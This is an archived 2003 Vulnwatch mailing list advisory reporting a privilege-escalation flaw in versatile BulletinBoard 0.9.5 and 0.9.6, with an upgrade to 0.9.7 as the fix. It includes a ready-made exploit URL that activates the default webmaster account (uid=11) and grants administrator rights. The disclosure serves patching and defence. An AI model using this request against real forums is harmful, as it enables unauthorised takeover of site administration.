Vulnwatch mailing list archives
vulnerability in versatile BulletinBoard Allows Gaining Administrative Privileges.
From: "NaSsEr .M.Sh" <nmsh_sa () yahoo com>
Date: Fri, 10 Jan 2003 10:03:44 -0800 (PST)
Vulnerable systems: 0.9.6 0.9.5 Immune systems: 0.9.7 Impact: versatile BulletinBoard suffers from a vulnerability that allows attacker to be a forum webmaster due to a bug in activation method. Exploit: uid=11 <===== is webmaster by default http://target.com/forumfolder/activate.php?uid=11&ac=0 Now click on button (go to forums). NOW YOU HAVE WEBMASTER PRIVILEGES Solution: Upgrade to the latest version of versatile BulletinBoard (version 0.9.7). - Website :http://vbb.eniki.de Provided by : Nasser.M.Sh nmsh_sa () yahoo com --------------------------------- Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now
Current thread:
- vulnerability in versatile BulletinBoard Allows Gaining Administrative Privileges. NaSsEr .M.Sh (Jan 10)